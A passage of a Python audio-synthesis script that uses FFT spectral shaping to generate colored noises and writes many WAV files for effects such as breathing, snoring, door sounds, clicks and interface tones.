rm=r
r = n.int16(r * float(2**15-1))
w.write('marrom.wav', f_a, r)
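# Note (added for clarity): each colored noise below follows the same recipe,
# only the gain per octave changes; the coefficient amplitudes are scaled by
# (10**(g_dB/20))**log2(f/f0), i.e. g_dB decibels per octave above f0. The
# helper below is only a sketch of that pattern (its name is illustrative and
# it is not used by the script, which keeps writing each color explicitly).
def colore_espectro(coefs_, g_dB):
    fator_ = 10.**(g_dB/20.)
    alphai_ = fator_**(n.log2(fi[i0:]/f0))
    c_ = n.copy(coefs_)
    c_[i0:] = c_[i0:]*alphai_
    # keep the spectrum Hermitian: real part even, imaginary part odd
    c_[Lambda/2+1:] = n.real(c_[1:Lambda/2])[::-1] - 1j * \
            n.imag(c_[1:Lambda/2])[::-1]
    # back to the time domain (the script then normalizes and writes the result)
    return n.real(n.fft.ifft(c_))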
### 2.53 Blue noise
# for each octave, we gain 3 dB
fator = 10.**(3/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# real part even, imaginary part odd
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
# generating time-domain samples of the blue noise
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
ra=r
r = n.int16(r * float(2**15-1))
w.write('azul.wav', f_a, r)
### 2.54 Violet noise
# for each octave, we gain 6 dB
fator = 10.**(6/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# real part even, imaginary part odd
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rv=r
r = n.int16(r * float(2**15-1))
w.write('violeta.wav', f_a, r)
### 2.51 Pink noise
# for each octave, 3 dB is lost
fator = 10.**(-3/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = coefs[i0:]*alphai
# real part even, imaginary part odd
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rr=r
r = n.int16(r * float(2**15-1))
w.write('rosa.wav', f_a, r)
fator = 10.**(-9/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# real part even, imaginary part odd
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
# generating time-domain samples of the black noise
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rp=r
r = n.int16(r * float(2**15-1))
w.write('preto.wav', f_a, r)
#w.write('respira.wav', f_a, N(H((
# rr[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rr[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rr[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# ))))
#
#w.write('respira2.wav', f_a, N(H((
# rp[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rp[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rp[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# ))))
#
#
#w.write('respira3.wav', f_a, N(H((
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# 5.*adsr(rm[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# 5.*adsr(rm[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# 5.*adsr(rm[:int(f_a*.5)],S=-.5,A=360.),
# ))))
#
#
#w.write('respira4.wav', f_a, N(H((
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rb[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rb[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rb[:int(f_a*.5)],S=-.5,A=360.),
# ))))
#
#
#w.write('respira5.wav', f_a, N(H((
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rv[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rv[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rv[:int(f_a*.5)],S=-.5,A=360.),
# ))))
#
#
#w.write('respira6.wav', f_a, N(H((
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# ))))
#
#
#f0=110.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
#
#
#
#f0=1100.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca2.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
#
#
#
#f0=11000.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca3.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
#
#
#
#f0=410.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=adsr(v(f=ff,d=4.,nu=0.)*a_,S=-5.)
#
#w.write('pisca4.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
##### PISCA TTMPPC
#f0=110.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
#
#
#f0=1100.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca2_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
#
#
#f0=11000.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca3_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
#
#
#f0=410.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=adsr(v(f=ff,d=4.,nu=0.)*a_,S=-5.)
#
#w.write('pisca4_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
##### END TTMPPC
w.write('comendo6.wav', f_a, N(fala("O melhor que voce faz com a sua boca, eh servir de toca, para outra cabessa. Nao que voce meressa, esta oportunidade, que vem com a idade, de se curtir em mim.",ss=3500)))
w.write('comendo7.wav', f_a, N(fala("Diga aonde voce vai, que eu vou varrendo, diga aonda voce vai, que eu vou varrendo. Vou varrendo, vou varrendo vou varrendo. Vou varrendo, vou varrendo, vou varrendo.",ss=3500)))
#
#
#w.write('comendo.wav', f_a, N(fala("mahnamnahamhahamnahamhanhamnanhnahamha")))
#w.write('comendo2.wav', f_a, N(fala("manamnaamaamnaamanamnannaama")))
#w.write('comendo3.wav', f_a, N(fala("mnmnmmnmnmnnnm")))
#w.write('comendo4.wav', f_a, N(fala("mnmnmm nmnm nn nmnmnmn")))
#w.write('comendo5.wav', f_a, N(fala("mnhmnhmm nhmhnm nn nhmhnmhnhmn")))
#
#
#w.write('chorando_.wav', f_a, N(fala("bbbbuaaa bbbbbuaaa bbbbuaaa bbbuaaa")))
#
#
#w.write('chorando_2.wav', f_a, N(fala("buaaa bbuaaa buaaa buaaa")))
#
#
#
#w.write('chorando_3.wav', f_a, N(fala("buaaa nheee ee ee nheeee e eeeee bbuaaa buaaa nheeeee eee eeeee buaaa")))
#
#
#w.write('chorando_4.wav', f_a, N(fala("buaaa nheee ee hhh hhh hhh ee nheeehhhh h hh hhe e eeeee bbuhhh h hh haaa buaaa nhhhh hhh eeeee eee hhhhhh h heeeee buaaa")))
#
w.write('coma.wav', f_a, N(H((
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
)),.3))
w.write('coma2.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
)),.3))
w.write('coma3.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
)),.3))
w.write('coma4.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
)),.3))
w.write('coma5.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
)),.3))
w.write('coma6.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
)),.3))
w.write('coma7.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
)),.3))
w.write('coma8.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
)),.3))
w.write('respira7.wav', f_a, N(H((
adsr(rr[ :int(f_a*1.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*1.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*1.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*1.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*1.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*1.5)],S=-.5,A=360.),
))))
w.write('respira8.wav', f_a, N(H((
adsr(rr[ :int(f_a*2.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*2.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*2.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*2.5)],S=-.5,A=360.),
))))
w.write('respira9.wav', f_a, N(H((
adsr(rr[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
))))
w.write('respira91.wav', f_a, N(H((
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
))))
w.write('respira92.wav', f_a, N(H((
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
))))
w.write('dormindo.wav', f_a, N(H((
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
))))
# arroto3 arroto6 arroto 9 92
w.write('dormindo2.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
))))
w.write('dormindo2.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
))))
ronco=H((
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
))
w.write('dormindo3.wav', f_a, N(H((
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
))))
w.write('dormindo4.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),ronco,n.zeros(f_a),
))))
w.write('dormindo5.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
))))
w.write('dormindo6.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
))))
w.write('dormindo7.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
))))
ronco2=H((
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
))
w.write('dormindo8.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
))))
w.write('dormindo9.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
))))
w.write('dormindo91.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
))))
w.write('dormindo92.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
))))
w.write('porta_abre.wav', f_a, N(v(200,fv=1./(7*2.),d=1.0,nu=20.)))
w.write('porta_abre2.wav', f_a, N(v(800,fv=1./(7*2.),d=1.0,nu=20.)))
w.write('porta_abre3.wav', f_a, N(v(800,fv=1.,d=.5,nu=20.,tabv=D_i)))
w.write('porta_abre4.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i)))
w.write('porta_abre5.wav', f_a, N(v(2800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i)))
w.write('porta_abre6.wav', f_a, N(v(2800,fv=1.,d=.5,nu=2.,tabv=D_i,tab=Tr_i)))
w.write('porta_abre7.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=D_i)))
w.write('porta_abre8.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Q_i)))
w.write('porta_fecha.wav', f_a, N(v(200,fv=1./(7*2.),d=1.0,nu=20. , tabv=S_i*-1)))
w.write('porta_fecha2.wav', f_a, N(v(800,fv=1./(7*2.),d=1.0,nu=20. , tabv=S_i*-1)))
w.write('porta_fecha3.wav', f_a, N(v(800,fv=1.,d=.5,nu=20.,tabv=D_i)))
w.write('porta_fecha4.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i*-1)))
w.write('porta_fecha5.wav', f_a, N(v(2800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i*-1)))
w.write('porta_fecha6.wav', f_a, N(v(2800,fv=1.,d=.5,nu=2.,tabv=D_i,tab=Tr_i *-1)))
w.write('porta_fecha7.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=D_i *-1)))
w.write('porta_fecha8.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Q_i *-1)))
w.write('clique.wav', f_a, N(n.array([0]*100+[1]+[0]*10000)))
w.write('clique2.wav', f_a, N(adsr(v(fv=20,d=.2),S=-3.)))
w.write('clique3.wav', f_a, N(adsr(v(fv=20,d=.2,tab=Tr_i),S=-3.)))
w.write('clique4.wav', f_a, N(adsr(v(f=1000.,fv=20,d=.2,tab=Tr_i),S=-3.)))
w.write('clique5.wav', f_a, N(adsr(v(f=660.,fv=20,d=.2,tab=Tr_i),S=-3.)))
w.write('seleciona.wav', f_a, N(adsr(v(f=460.,fv=1.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('seleciona2.wav', f_a, N(adsr(v(f=460.,fv=10.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('cancela.wav', f_a, N(adsr(v(f=460.,fv=100.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('cancela2.wav', f_a, N(adsr(v(f=40.,fv=100.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('msgPos.wav', f_a, N(H((
adsr(v(f=440.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=440.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgNeg.wav', f_a, N(H((
adsr(v(f=440.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=440.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=440.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgPos2.wav', f_a, N(H((
